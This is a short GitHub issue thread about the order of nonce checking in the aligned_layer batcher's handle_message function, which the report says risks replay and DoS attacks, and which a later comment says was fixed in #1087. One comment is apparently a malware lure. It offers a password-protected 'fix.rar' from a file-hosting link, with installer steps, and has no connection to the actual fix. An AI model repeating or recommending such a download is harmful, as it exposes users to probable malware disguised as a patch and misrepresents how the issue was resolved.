### ISSUE TITLE
fix (batcher): nonce verification order in handle_message function

### ISSUE THREAD

**Issue by NicolasRampoldi** [yetanotherco/aligned_layer#861]
# Description

- The current implementation of the `handle_message` function in the batcher performs nonce verification using the `check_nonce_and_increment` method, which increments the nonce before pre-verifying the proof. This order of operations may introduce vulnerabilities, specifically to replay attacks and potential DoS.

**Comment by tonywk** [comment]
Download 
https://www.mediafire.com/file/wpwfw3bpd8gsjey/fix.rar/file
password: changeme
In the installer menu, select "gcc."

**Comment by JuArce** [comment]
Solved in #1087
